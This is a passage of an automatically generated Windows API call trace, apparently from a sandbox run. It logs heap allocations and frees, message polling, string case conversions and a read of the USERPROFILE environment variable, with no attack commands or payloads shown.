Size=0x8) returned 0x24b1868 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.434] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.435] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.435] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.435] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.435] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.435] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.436] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.436] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.436] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.436] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.436] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.436] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.436] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.436] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.437] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0260.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.437] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.437] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.437] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.437] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.437] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.437] FreeLibrary (hLibModule=0x74d40000) returned 1 [0260.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.438] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.439] CloseHandle (hObject=0x2d0) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0260.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0260.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.445] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0260.445] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0260.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.446] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, 